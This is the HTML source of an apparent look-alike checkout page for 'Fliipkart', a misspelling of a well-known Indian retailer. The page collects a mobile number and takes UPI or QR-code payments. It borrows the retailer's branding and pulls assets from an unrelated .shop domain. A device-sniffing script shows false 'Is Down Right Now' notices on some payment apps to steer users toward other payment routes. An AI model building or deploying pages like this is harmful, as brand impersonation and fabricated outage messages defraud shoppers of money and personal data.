
 <!DOCTYPE html>
<html lang="en-IN">
    <head>
        
        <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-11441133247"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'AW-11441133247');
</script>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

    <title>Online Shopping Site for Lifestyle, Mobiles, Electronics, Furniture, Grocery, Books & More. Best Offers!</title>
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="Keywords" content="Online Shopping in India,online Shopping store,Online Shopping Site,Buy Online,Shop Online,Online Shopping, Fliipkart">
    <meta name="Description" content="India's biggest online store for Mobiles, Fashion (Clothes/Shoes), Electronics, Home Appliances, Books, Home, Furniture, Grocery, Jewelry, Sporting goods, Beauty & Personal Care and more! Find the largest selection from all brands at the lowest prices in India. &amp; more.">
    <meta property="og:title" content="Online Shopping India Lifestyle Mobile, Cameras, & more Online @ Fliipkart.com">
    <meta name="theme-color" content="#2874f0" id="themeColor">
    <meta name="viewport" content="width=device-width,minimum-scale=1,user-scalable=no">
    <link rel="shortcut icon" href="/assets/images/favicon.ico">
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/main1.css">
    <link rel="stylesheet" href="https://sony-blackbrocandiospeake.shop/assets/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer">
    <script src="assets/js/jquery.min.js"></script>
    <meta name="google-site-verification" content="WGDp73cQJI4DXzpyPaTV1VGDeKLhNaoZDoM0kjCbPnU">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins&amp;display=swap" rel="stylesheet">
    <script src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
    <style>
        body,
        a,
        p,
        span,
        div,
        input,
        button,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        button,
        input,
        optgroup,
        select,
        textarea {
             font-family: Roboto, Helvetica, Arial, sans-serif !important;
        }
    </style>

    </head>

<body class="expansion-alids-init" cz-shortcut-listen="true">
    <div id="container" style="overflow:hidden">
        <div style="height:100%" data-reactroot="">
            <div>
                <div class="_2dxSCm">
                    


<div class="_2dxSCm">
                    <div class="_3CzzrP" style="">
                        <div class="_38U37R">
                            <div>
                                <div class="_1FWdmb" style="">
                                    <div class="d-flex align-items-center">
                                        <a class="_3NH1qf " id="back-btn" style="margin-top:5px;">
                                           <svg width="19" height="16" viewBox="0 0 19 16" xmlns="http://www.w3.org/2000/svg">
                                <path d="M17.556 7.847H1M7.45 1L1 7.877l6.45 6.817" stroke="#000" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round" fill="none"></path>
                            </svg>
                                        </a>
                                        <a class="_3NH1qf d-none" id="showmenu">
                                            <svg width="100%" height="100%" fill="none" xmlns="http://www.w3.org/2000/svg" mt="5" iconsize="24" class="sc-gswNZR jQgwzc">
                                                <path d="M2 17.2222C2 17.8359 2.49746 18.3333 3.11111 18.3333H20.8889C21.5025 18.3333 22 17.8359 22 17.2222C22 16.6086 21.5025 16.1111 20.8889 16.1111H3.11111C2.49746 16.1111 2 16.6086 2 17.2222ZM2 11.6667C2 12.2803 2.49746 12.7778 3.11111 12.7778H20.8889C21.5025 12.7778 22 12.2803 22 11.6667C22 11.053 21.5025 10.5556 20.8889 10.5556H3.11111C2.49746 10.5556 2 11.053 2 11.6667ZM3.11111 5C2.49746 5 2 5.49746 2 6.11111C2 6.72476 2.49746 7.22222 3.11111 7.22222H20.8889C21.5025 7.22222 22 6.72476 22 6.11111C22 5.49746 21.5025 5 20.8889 5H3.11111Z" fill="#333333"></path>
                                            </svg>
                                        </a>
                                                                                <h4 class="header-title">Payment</h4>
                                    </div>
                                    <div class="header-menu">
                                        <a class="_3NH1qf" href="#">
                                            <svg width="24" height="25" fill="none" xmlns="http://www.w3.org/2000/svg" ml="16" iconsize="24" class="sc-gswNZR dJzkYm">
                                                <path fill="#fff" d="M0 .657h24v24H0z"></path>
                                                <path fill="#fff" d="M2 2.657h20v20H2z"></path>
                                                <path d="M22 9.174c0 3.724-1.87 7.227-9.67 12.38a.58.58 0 0 1-.66 0C3.87 16.401 2 12.898 2 9.174S4.59 3.67 7.26 3.66c3.22-.081 4.61 3.573 4.74 3.774.13-.201 1.52-3.855 4.74-3.774C19.41 3.669 22 5.45 22 9.174Z" fill="#ED3843"></path>
                                            </svg>
                                        </a>
                                        <a class="_3NH1qf" href="#" onclick="openNav()">
                                            <svg width="24" height="25" fill="none" xmlns="http://www.w3.org/2000/svg" ml="16" iconsize="24" class="sc-gswNZR dJzkYm">
                                                <g clip-path="url(#cart-header_svg__a)">
                                                    <path fill="#fff" d="M2.001 1.368h20v20h-20z"></path>
                                                    <g clip-path="url(#cart-header_svg__b)">
                                                        <g clip-path="url(#cart-header_svg__c)">
                                                            <path d="M6.003 5.183h15.139c.508 0 .908.49.85 1.046l-.762 7.334c-.069.62-.537 1.1-1.103 1.121l-12.074.492-2.05-9.993Z" fill="#C53EAD"></path>
                                                            <path d="M11.8 21.367c.675 0 1.22-.597 1.22-1.334 0-.737-.545-1.335-1.22-1.335-.673 0-1.22.598-1.22 1.335s.547 1.334 1.22 1.334ZM16.788 21.367c.674 0 1.22-.597 1.22-1.334 0-.737-.546-1.335-1.22-1.335-.673 0-1.22.598-1.22 1.335s.547 1.334 1.22 1.334Z" fill="#9F2089"></path>
                                                            <path d="m2.733 4.169 3.026 1.42 2.528 12.085c.127.609.615 1.036 1.181 1.036h9.615" stroke="#9F2089" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                                                        </g>
                                                    </g>
                                                </g>
                                                <defs>
                                                    <clipPath id="cart-header_svg__a">
                                                        <path fill="#fff" transform="translate(2.001 1.368)" d="M0 0h20v20H0z"></path>
                                                    </clipPath>
                                                    <clipPath id="cart-header_svg__b">
                                                        <path fill="#fff" transform="translate(2.001 1.368)" d="M0 0h20v20H0z"></path>
                                                    </clipPath>
                                                    <clipPath id="cart-header_svg__c">
                                                        <path fill="#fff" transform="translate(2.001 3.368)" d="M0 0h20v18H0z"></path>
                                                    </clipPath>
                                                </defs>
                                            </svg>
                                            <span class="header__cart-count header__cart-count--floating bubble-count">1</span>
                                        </a>
                                    </div>
                                </div>
                                <div class="search-bar d-none">
                                    <div class="_3QNhdh" id="guidSearch">
                                        <div class="ORogdv">
                                            <div class="_1k9EoO">
                                                <div class="_2d36Hu">
                                                    <a href="javascript:void(0)" class="search-div">
                                                        <div placeholder="Search for Sarees, Kurtis, Cosmetics, etc." class="sc-eeMvmM fscVpr">
                                                            <div class="sc-cUEOzv ilUiic"><svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg">
                                                                    <rect width="20" height="20" transform="translate(0 0.560547)" fill="white"></rect>
                                                                    <g clip-path="url(#clip0_2444_6193)">
                                                                        <path d="M13.4564 12.0018L11.4426 14.0156L16.3498 18.9228C16.7013 19.2743 17.2711 19.2743 17.6226 18.9228L18.3636 18.1818C18.7151 17.8303 18.7151 17.2604 18.3636 16.909L13.4564 12.0018Z" fill="#ADADC4"></path>
                                                                        <path d="M14.7135 8.69842C14.7135 12.3299 11.7696 15.2738 8.13812 15.2738C4.50664 15.2738 1.56274 12.3299 1.56274 8.69842C1.56274 5.06694 4.50664 2.12305 8.13812 2.12305C11.7696 2.12305 14.7135 5.06694 14.7135 8.69842Z" fill="#EAEAF2" stroke="#ADADC4" stroke-width="1.125"></path>
                                                                    </g>
                                                                    <defs>
                                                                        <clipPath id="clip0_2444_6193">
                                                                            <rect width="18" height="18" fill="white" transform="translate(1 1.56055)"></rect>
                                                                        </clipPath>
                                                                    </defs>
                                                                </svg></div><input font-size="13px" font-weight="book" type="text" placeholder="Search for Sarees, Kurtis, Cosmetics, etc." readonly="" class="sc-dkrFOg bWTBPR sc-bCfvAP dsLogY search-input-elm sc-bCfvAP dsLogY search-input-elm" color="greyBase" value="">
                                                        </div>
                                                    </a>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="sc-bBXxYQ jMfCEJ"></div>    <style>
        .cart_page_footer {
            box-shadow: none;
            position: fixed;
            bottom: 80px
        }

        .header-menu {
            display: none;
        }

        .cart-list {
            max-height: max-content;
        }

        ._1fhgRH {
            margin-bottom: 250px;
        }

        .gNFCeh {
            display: flex;
            -webkit-box-pack: justify;
            justify-content: space-between;
            padding: 16px 16px 18px;
            background-color: #FFFFFF;
        }

        .fill-grey-t2 {
            fill: rgb(139, 139, 163);
        }

        .hEBjyt {
            color: rgb(53, 53, 67);
            font-style: normal;
            font-weight: 700;
            font-size: 17px;
            line-height: 20px;
            font-family: "Mier bold";
            margin: 0px;
            padding: 0px;
        }

        .cHsEym {
            padding: 0px 16px 18px;
            background-color: #FFFFFF;
        }

        .efQsfx {
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: start;
            justify-content: start;
            flex-direction: row;
            border-radius: 4px;
            background-color: rgb(231, 238, 255);
            padding: 6px 12px;
            gap: 10px;
        }

        .eVDQPI {
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            padding-left: 10px;
            height: 60px;
            width: 60px;
        }

        .cOCnuI {
            display: flex;
            -webkit-box-align: center;
            -webkit-box-pack: center;
            justify-content: center;
            flex-direction: column;
            align-items: flex-start;
            max-height: 50px;
            border-radius: 4px;
            background-color: rgb(231, 238, 255);
        }

        .eNkLGR {
            color: #ffc200;
            font-style: normal;
            font-weight: 600;
            font-size: 15px;
            line-height: 20px;
            font-family: "Mier demi";
            margin: 0px;
            padding: 0px;
        }

        .RrifI {
            color: rgb(85, 133, 248);
        }

        .GmPbS {
            padding: 6px 16px;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            gap: 10px;
            background-color: #FFFFFF;
        }

        .GmPbS span {
            font-weight: 600;
            font-size: 10px;
            font-family: "Mier book";
        }

        .GmPbS div {
            height: 1px;
            background-color: rgb(206, 206, 222);
            -webkit-box-flex: 1;
            flex-grow: 1;
        }

        .cart__footer {
            position: unset;
            box-shadow: unset;
            border-top: 5px solid #eaeaf2;
            border-bottom: 5px solid #eaeaf2;
        }

        .error-message {
            font-size: 14px;
            color: red;
            text-align: center;
            margin-top: 10px;
        }

        .eGwEyP {
            padding: 12px 16px;
            display: flex;
            -webkit-box-pack: justify;
            justify-content: space-between;
        }

        .dUijPM {
            display: flex;
            flex-direction: column;
            -webkit-box-pack: justify;
            justify-content: space-between;
            max-width: 50%;
            padding-right: 8px;
        }

        .dUijPM span {
            color: rgb(53, 53, 67);
            font-weight: 700;
            font-size: 17px;
            line-height: 20px;
            font-family: "Mier bold";
        }

        .dUijPM button {
            font-weight: unset;
            font-family: "Mier bold";
        }

        .ylmAj {
            color: #ffc200;
            cursor: pointer;
            font-style: normal;
            text-align: center;
            letter-spacing: 0.0015em;
            font-size: 13px;
            font-weight: 700;
            line-height: 16px;
            border-radius: 4px;
            background: inherit;
            border: none;
            padding: 0px;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
        }

        .iAFVK {
            width: 50%;
        }

        .iAFVK button {
            width: 100%;
            font-weight: 600;
            font-family: "Mier demi";
            color: black;
        }

        .bwHzRF {
            cursor: pointer;
            font-style: normal;
            text-align: center;
            letter-spacing: 0.0015em;
            font-size: 15px;
            line-height: 20px;
            border-radius: 4px;
            color: rgb(255, 255, 255);
            background: #ffc200;
            border: none;
            padding: 12px;
            font-weight: 500;
            width: 100%;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
        }

        .ixHOyU {
            position: fixed;
            width: 100%;
            max-width: 800px;
            background-color: rgb(255, 255, 255);
            bottom: 0px;
            z-index: 1;
        }

        .IhlWp {
            display: flex;
            -webkit-box-pack: center;
            justify-content: center;
            -webkit-box-align: center;
            align-items: center;
            width: 20px;
            height: 20px;
            border-radius: 50%;
            border: 2px solid rgb(85, 133, 248);
            color: rgb(85, 133, 248);
            font-size: 11px;
            font-weight: 700;
            background-color: rgb(255, 255, 255);
        }
        
        
        .form-check1 {
    font-size: 20px;
    border: 1px solid #9c9c9c70;
    margin-bottom: 15px;
    border-radius: 6px;
    padding-left: 0;
    width: 100%;
    text-align: center;
    /* height: 60px; */
    background: #fff;
}

.form-check1.active {
    border-color: #216ee0;
}

.form-check1 input {
    height: 20px;
    width: 20px;
    border: 1px solid;
}

.form-check1 label.form-check-label {
    display: flex;
    align-items: center;
    padding: 16px;
    /* flex-flow: column; */
    /* width: 80px; */
    /* height: 80px; */
}

.form-check1 .form-check-label.input {
    margin-right: 10px;
}
.form-check1.available-method span {
    font-size: 18px;
    font-weight: 600;
    margin-left: 13px;
    text-overflow: ellipsis;
    white-space: nowrap;
    /* width: 100%; */
    overflow: hidden;
}
.qr-code-container {
      display: flex;
      align-items: center;
      justify-content: center;
      height: 30vh; /* Full viewport height */
      background-color: #f5f5f5;
      position: relative;
    }

    .qr-code-container .qr-code {
      width: 200px;
      height: 200px;
    }
    .input-container {
  margin-top: 16px;
  display: flex;
  flex-direction: column;
  gap: 4px;
}

.input-label {
  font-size: 14px;
  font-weight: 600;
  color: #333;
  margin-left: 4px;
}

.input-field {
  background-color: #ffffff;
  border: 1px solid #d1d5db;
  color: #1f2937;
  font-size: 14px;
  padding: 10px 12px;
  border-radius: 8px;
  width: 100%;
  box-sizing: border-box;
  transition: border-color 0.3s ease, box-shadow 0.3s ease;
}

.input-field:focus {
  border-color: #3b82f6;
  box-shadow: 0 0 0 1px #3b82f6;
  outline: none;
}

.input-field::placeholder {
  color: #9ca3af;
}
  .disabled {
            pointer-events: none;
            opacity: 0.5;
            background-color: #d3d3d3; /* Light grey color for disabled buttons */
        }


    </style>
    <div id="container">
        
        <div style="" data-reactroot="">
            
                </div>
                <div class="sc-bBXxYQ jMfCEJ"></div>

                <div class="sc-dwVMhp gNFCeh">
                    <h6 font-size="17px" font-weight="bold" color="greyBase" class="sc-fnykZs hEBjyt">Select Payment Method</h6><svg width="80" height="24" viewBox="0 0 80 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M11.1172 3C10.3409 3 9.04382 3.29813 7.82319 3.63C6.57444 3.9675 5.31557 4.36687 4.57532 4.60875C4.26582 4.71096 3.99143 4.8984 3.78367 5.14954C3.57591 5.40068 3.44321 5.70533 3.40082 6.0285C2.73032 11.0651 4.28619 14.7979 6.17394 17.2672C6.97447 18.3236 7.92897 19.2538 9.00557 20.0269C9.43982 20.334 9.84257 20.5691 10.1845 20.73C10.4995 20.8785 10.8382 21 11.1172 21C11.3962 21 11.7337 20.8785 12.0498 20.73C12.4621 20.5296 12.8565 20.2944 13.2288 20.0269C14.3054 19.2538 15.2599 18.3236 16.0604 17.2672C17.9482 14.7979 19.504 11.0651 18.8335 6.0285C18.7912 5.70518 18.6586 5.40035 18.4508 5.14901C18.2431 4.89768 17.9686 4.71003 17.659 4.60762C16.5845 4.25529 15.5015 3.92894 14.4112 3.62888C13.1905 3.29925 11.8934 3 11.1172 3ZM13.5314 9.68925C13.637 9.58363 13.7803 9.52429 13.9297 9.52429C14.079 9.52429 14.2223 9.58363 14.3279 9.68925C14.4335 9.79487 14.4929 9.93813 14.4929 10.0875C14.4929 10.2369 14.4335 10.3801 14.3279 10.4858L10.9529 13.8608C10.9007 13.9131 10.8386 13.9547 10.7703 13.9831C10.7019 14.0114 10.6287 14.026 10.5547 14.026C10.4807 14.026 10.4074 14.0114 10.3391 13.9831C10.2707 13.9547 10.2087 13.9131 10.1564 13.8608L8.46894 12.1733C8.41664 12.121 8.37516 12.0589 8.34685 11.9905C8.31855 11.9222 8.30398 11.849 8.30398 11.775C8.30398 11.701 8.31855 11.6278 8.34685 11.5595C8.37516 11.4911 8.41664 11.429 8.46894 11.3767C8.52124 11.3244 8.58333 11.283 8.65166 11.2547C8.71999 11.2264 8.79323 11.2118 8.86719 11.2118C8.94115 11.2118 9.01439 11.2264 9.08272 11.2547C9.15105 11.283 9.21314 11.3244 9.26544 11.3767L10.5547 12.6671L13.5314 9.68925Z" fill="#ADC6FF"></path>
                        <path d="M24.1172 3.53998L24.2472 4.65998L26.0372 3.67998V9.49998H27.1472V2.49998H26.1472L24.1172 3.53998Z" class="fill-grey-t2"></path>
                        <path d="M31.5958 9.64998C33.2058 9.64998 34.2458 8.19998 34.2458 5.99998C34.2458 3.79998 33.2058 2.34998 31.5658 2.34998C29.9458 2.34998 28.9158 3.79998 28.9158 5.99998C28.9158 8.19998 29.9458 9.64998 31.5958 9.64998ZM31.5958 8.62998C30.5958 8.62998 30.0658 7.55998 30.0658 5.99998C30.0658 4.43998 30.5858 3.36998 31.5658 3.36998C32.5658 3.36998 33.0958 4.43998 33.0958 5.99998C33.0958 7.55998 32.5658 8.62998 31.5958 8.62998Z" class="fill-grey-t2"></path>
                        <path d="M38.149 9.64998C39.759 9.64998 40.799 8.19998 40.799 5.99998C40.799 3.79998 39.759 2.34998 38.119 2.34998C36.499 2.34998 35.469 3.79998 35.469 5.99998C35.469 8.19998 36.499 9.64998 38.149 9.64998ZM38.149 8.62998C37.149 8.62998 36.619 7.55998 36.619 5.99998C36.619 4.43998 37.139 3.36998 38.119 3.36998C39.119 3.36998 39.649 4.43998 39.649 5.99998C39.649 7.55998 39.119 8.62998 38.149 8.62998Z" class="fill-grey-t2"></path>
                        <path d="M43.4923 6.24998C44.3823 6.24998 45.0923 5.55998 45.0923 4.29998C45.0923 3.03998 44.3823 2.34998 43.4923 2.34998C42.6123 2.34998 41.9023 3.03998 41.9023 4.29998C41.9023 5.55998 42.6123 6.24998 43.4923 6.24998ZM48.2923 2.49998H47.4323L42.7823 9.49998H43.6423L48.2923 2.49998ZM43.4923 5.43998C43.0623 5.43998 42.7623 5.06998 42.7623 4.29998C42.7623 3.52998 43.0623 3.15998 43.4923 3.15998C43.9223 3.15998 44.2323 3.52998 44.2323 4.29998C44.2323 5.06998 43.9223 5.43998 43.4923 5.43998ZM47.5823 9.64998C48.4723 9.64998 49.1823 8.95998 49.1823 7.69998C49.1823 6.43998 48.4723 5.74998 47.5823 5.74998C46.7023 5.74998 45.9923 6.43998 45.9923 7.69998C45.9923 8.95998 46.7023 9.64998 47.5823 9.64998ZM47.5823 8.83998C47.1523 8.83998 46.8523 8.46998 46.8523 7.69998C46.8523 6.92998 47.1523 6.55998 47.5823 6.55998C48.0223 6.55998 48.3223 6.92998 48.3223 7.69998C48.3223 8.46998 48.0223 8.83998 47.5823 8.83998Z" class="fill-grey-t2"></path>
                        <path d="M55.4541 9.64998C56.9141 9.64998 57.9341 8.78998 57.9341 7.47998C57.9341 4.79998 54.3341 5.96998 54.3341 4.29998C54.3341 3.69998 54.8141 3.34998 55.4641 3.34998C56.2141 3.34998 56.6841 3.78998 56.7941 4.42998L57.9041 4.22998C57.7241 3.12998 56.8241 2.34998 55.4941 2.34998C54.1441 2.34998 53.1741 3.16998 53.1741 4.39998C53.1741 7.07998 56.7641 5.90998 56.7641 7.59998C56.7641 8.22998 56.2541 8.65998 55.4841 8.65998C54.7941 8.65998 54.1341 8.28998 54.0141 7.57998L52.9041 7.81998C53.1041 8.98998 54.2041 9.64998 55.4541 9.64998Z" class="fill-grey-t2"></path>
                        <path d="M65.2964 9.49998L62.6764 2.45998H61.4064L58.7864 9.49998H59.9964L60.6264 7.68998H63.4264L64.0664 9.49998H65.2964ZM62.0564 3.73998L63.0864 6.65998H60.9964L62.0164 3.73998H62.0564Z" class="fill-grey-t2"></path>
                        <path d="M71.3322 2.49998H66.7522V9.49998H67.8922V6.54998H70.4722V5.50998H67.8922V3.53998H71.3322V2.49998Z" class="fill-grey-t2"></path>
                        <path d="M77.6917 2.49998H73.0417V9.49998H77.6917V8.45998H74.1817V6.49998H76.8417V5.44998H74.1817V3.53998H77.6917V2.49998Z" class="fill-grey-t2"></path>
                        <path d="M27.307 18.9C28.657 18.9 29.627 17.95 29.627 16.7C29.627 15.33 28.537 14.5 27.207 14.5H24.717V21.5H25.857V18.9H27.307ZM28.447 16.7C28.447 17.31 28.027 17.85 27.117 17.85H25.857V15.55H27.007C28.037 15.55 28.447 16.11 28.447 16.7Z" class="fill-grey-t2"></path>
                        <path d="M36.4524 21.5L33.8324 14.46H32.5624L29.9424 21.5H31.1524L31.7824 19.69H34.5824L35.2224 21.5H36.4524ZM33.2124 15.74L34.2424 18.66H32.1524L33.1724 15.74H33.2124Z" class="fill-grey-t2"></path>
                        <path d="M39.6613 21.5V18.57L42.0913 14.5H40.8413L39.1513 17.45H39.1013L37.4113 14.5H36.0813L38.5213 18.57V21.5H39.6613Z" class="fill-grey-t2"></path>
                        <path d="M50.8513 21.5V14.5H49.1513L47.1513 19.76H47.1113L45.1213 14.5H43.3513V21.5H44.4913V15.98H44.5313L46.6113 21.5H47.5913L49.6713 15.98H49.7113V21.5H50.8513Z" class="fill-grey-t2"></path>
                        <path d="M57.5103 14.5H52.8604V21.5H57.5103V20.46H54.0004V18.5H56.6604V17.45H54.0004V15.54H57.5103V14.5Z" class="fill-grey-t2"></path>
                        <path d="M65.3439 21.54V14.5H64.2039V19.78L60.5339 14.46H59.2639V21.5H60.4039V16.22L64.0739 21.54H65.3439Z" class="fill-grey-t2"></path>
                        <path d="M72.0671 14.5H66.7571V15.55H68.8471V21.5H69.9871V15.55H72.0671V14.5Z" class="fill-grey-t2"></path>
                        <path d="M75.4028 21.65C76.8628 21.65 77.8828 20.79 77.8828 19.48C77.8828 16.8 74.2828 17.97 74.2828 16.3C74.2828 15.7 74.7628 15.35 75.4128 15.35C76.1628 15.35 76.6328 15.79 76.7428 16.43L77.8528 16.23C77.6728 15.13 76.7728 14.35 75.4428 14.35C74.0928 14.35 73.1228 15.17 73.1228 16.4C73.1228 19.08 76.7128 17.91 76.7128 19.6C76.7128 20.23 76.2028 20.66 75.4328 20.66C74.7428 20.66 74.0828 20.29 73.9628 19.58L72.8528 19.82C73.0528 20.99 74.1528 21.65 75.4028 21.65Z" class="fill-grey-t2"></path>
                    </svg>
                </div>
                <div class="sc-hKdnnL cHsEym">
                    <div class="sc-liHMlC efQsfx">
                        <!-- Added 'muted' attribute to allow autoplay in most browsers -->
                        <video autoplay muted loop playsinline src="assets/images/cod_lat.webm" class="sc-fSUSjI eVDQPI"></video>
                        <div class="sc-cuqtlR cOCnuI">
                            <span font-size="15px" font-weight="demi" class="sc-fnykZs eNkLGR sc-bTmccw RrifI sc-bTmccw RrifI" color="pinkBase">
                                Pay online &amp; get EXTRA ₹33 off
                            </span>
                        </div>
                    </div>
                </div>
                <div class="input-container">
                    <label for="mobile" class="input-label">Jio Mobile Number</label>
                    <input type="text" id="mobile" maxlength="10" oninput="handleInputChange()" class="input-field" placeholder="Enter mobile number">
                    <!-- <button type="button" onclick="storeValue()">Store Value</button> -->
                  </div>
                  
                  <div class="bg-slate-100 flex items-center p-2 rounded-xl mt-5">
                    
                      <path
                        d="m20.749 12 1.104-1.908a1 1 0 0 0-.365-1.366l-1.91-1.104v-2.2a1 1 0 0 0-1-1h-2.199l-1.103-1.909a1.008 1.008 0 0 0-.607-.466.993.993 0 0 0-.759.1L12 3.251l-1.91-1.105a1 1 0 0 0-1.366.366L7.62 4.422H5.421a1 1 0 0 0-1 1v2.199l-1.91 1.104a.998.998 0 0 0-.365 1.367L3.25 12l-1.104 1.908a1.004 1.004 0 0 0 .364 1.367l1.91 1.104v2.199a1 1 0 0 0 1 1h2.2l1.104 1.91a1.01 1.01 0 0 0 .866.5c.174 0 .347-.046.501-.135l1.908-1.104 1.91 1.104a1.001 1.001 0 0 0 1.366-.365l1.103-1.91h2.199a1 1 0 0 0 1-1v-2.199l1.91-1.104a1 1 0 0 0 .365-1.367L20.749 12zM9.499 6.99a1.5 1.5 0 1 1-.001 3.001 1.5 1.5 0 0 1 .001-3.001zm.3 9.6-1.6-1.199 6-8 1.6 1.199-6 8zm4.7.4a1.5 1.5 0 1 1 .001-3.001 1.5 1.5 0 0 1-.001 3.001z"
                      ></path>
               
                   
                  </div>
                 

                                <div>
                    <div data-testid="PAY ONLINE" class="sc-gVAlfg GmPbS">
                                        <span style="font-size: 18px;">PAY ONLINE</span>
                                        <div></div>
                                    </div>

                                    <ul class="accordion">
                                        <li class="accordion-item is-active">
                                            <h3 class="accordion-thumb">
                                                <div class="flex align-items-center">
                                                    <img src="/assets/images/upi_ppr.png" width="20PX">
                                                    <span class="order-summary px-2">UPI (GPay/PhonePe/Paytm)</span>
                                                </div>
                                            </h3>

                                            <div class="accordion-panel p-0 pt-3">
                                                <div class="plans">
                                                    <div class="form-check available-method" pay-type="gpay">
                                                        <label class="form-check-label">
                                                            <img src="/assets/images/gpay_icon.svg.png" class="pay-logo" alt="button">
                                                            <span class="unaviablee">G Pay</span>
                                                        </label>
                                                    </div>

                                                    <div class="form-check available-method" pay-type="phonepe">
                                                        <label class="form-check-label">
                                                            <img src="/assets/images/phonepe.svg" class="pay-logo" alt="button">
                                                            <span class="unaviablee">PhonePe</span>
                                                        </label>
                                                    </div>

                                                    <div class="form-check available-method" pay-type="paytm">
                                                        <label class="form-check-label">
                                                            <img src="/assets/images/paytm.svg" class="pay-logo" alt="button">
                                                            <span class="unaviablee">Paytm</span>
                                                        </label>
                                                    </div>
                                                </div>
                                            </div>
                                        </li>
                                    </ul>
                                </div>

                                <!-- Additional logic to disable buttons based on device -->
                                <script>
                                    function detectDevice() {
                                        var userAgent = navigator.userAgent || navigator.vendor || window.opera;
                                        if (/android/i.test(userAgent)) {
                                            return "android";
                                        } else if (/iPad|iPhone|iPod/.test(userAgent) && !window.MSStream) {
                                            return "ios";
                                        } else {
                                            return "other";
                                        }
                                    }

                                    function disablePaymentOptions() {
                                        var deviceType = detectDevice();

                                        if (deviceType === "android") {
                                            var phonepeButton = document.querySelector('div[pay-type="phonepe"]');
                                            if (phonepeButton && !phonepeButton.classList.contains('disabled')) {
                                                phonepeButton.classList.add('disabled');
                                                phonepeButton.style.pointerEvents = 'none';
                                                if (!phonepeButton.querySelector('[data-appended="true"]')) {
                                                    var message = document.createElement("span");
                                                    message.textContent = "Is Down Right Now";
                                                    message.classList.add('down-message');
                                                    message.setAttribute('data-appended', 'true');
                                                    phonepeButton.querySelector("label").appendChild(message);
                                                }
                                            }
                                        } else if (deviceType === "ios") {
                                            var gpayButton = document.querySelector('div[pay-type="gpay"]');
                                            var paytmButton = document.querySelector('div[pay-type="paytm"]');

                                            if (gpayButton && !gpayButton.classList.contains('disabled')) {
                                                gpayButton.classList.add('disabled');
                                                gpayButton.style.pointerEvents = 'none';
                                                if (!gpayButton.querySelector('[data-appended="true"]')) {
                                                    var message = document.createElement("span");
                                                    message.textContent = "Is Down Right Now";
                                                    message.classList.add('down-message');
                                                    message.setAttribute('data-appended', 'true');
                                                    gpayButton.querySelector("label").appendChild(message);
                                                }
                                            }

                                            if (paytmButton && !paytmButton.classList.contains('disabled')) {
                                                paytmButton.classList.add('disabled');
                                                paytmButton.style.pointerEvents = 'none';
                                                if (!paytmButton.querySelector('[data-appended="true"]')) {
                                                    var message = document.createElement("span");
                                                    message.textContent = "Is Down Right Now";
                                                    message.classList.add('down-message');
                                                    message.setAttribute('data-appended', 'true');
                                                    paytmButton.querySelector("label").appendChild(message);
                                                }
                                            }
                                        }
                                    }

                                    document.addEventListener('DOMContentLoaded', function () {
                                        disablePaymentOptions();
                                    });
                                </script>
                
                
                
                
                
                
                
                
                
                
                                <div>
                    <div data-testid="PAY ONLINE" class="sc-gVAlfg GmPbS">
                        <span style="font-size: 18px;">PAY BY SCANNER</span>
                        <div></div>
                    </div>
                    <ul class="accordion">
                        <li class="accordion-item is-active">
                            <h3 class="accordion-thumb ">
                                <div class=" flex align-items-center">
                                    <img src="assets/images/th.jpeg" width="20PX">
                                    <span class="order-summary px-2">Pay Using QR Code</span>
                                </div>
                            </h3>
                            <div class="accordion-panel p-0 pt-3">
                                <div class="plans">
                                    <div class="form-check1 available-method mt-3" id="form-check1"data-toggle="modal" data-target="#exampleModalCenter">
                                        <label class="form-check-label" onclick="qrCodePayment()">
                                            <img src="/assets/images/th.jpeg" class="pay-logo" alt="button">
                                            <span class="unaviablee" >Scan to Pay</span>
                                        </label>
                                    </div>
                                   <div id="qrcode" class="qr-code-container"></div>
                                        </div>
                                      </div>
                                    </div>
                                    
                                </div>
                            </div>
                        </li>
                    </ul>
                </div>
                                <div class="cart__footer">
                    <div class="cart__price__details">
                        <div class="cart__breakup__inner">
                            <div class="shipping__total">
                                <span class=""></span>
                                

                <div class="sc-lgVVsH ixHOyU">
                    <div class="sc-hQRsPl eGwEyP">
                        <div class="sc-fThYeS dUijPM"><span class="cartTotalAmount1"> </span><button class="sc-kLLXSd ylmAj">VIEW PRICE DETAILS</button></div>
                        <div class="sc-BrFsL iAFVK"><button class="sc-ikZpkk bwHzRF" onclick="payNow()">Continue</button></div>
                    </div>
                </div>

                <form method="post" id="paymentForm">
                    <input type="hidden" id="price" name="price" value="">
                    <input type="hidden" id="product_name" name="product_name" value="">
                    <input type="hidden" id="customerName" name="customerName" value="">
                    <input type="hidden" id="customerMobile" name="customerMobile" value="">
                    <button class="btn btn-dark d-none" value="submit" id="submitForm" name="submit" type="submit"></button>
                </form>
            </div>
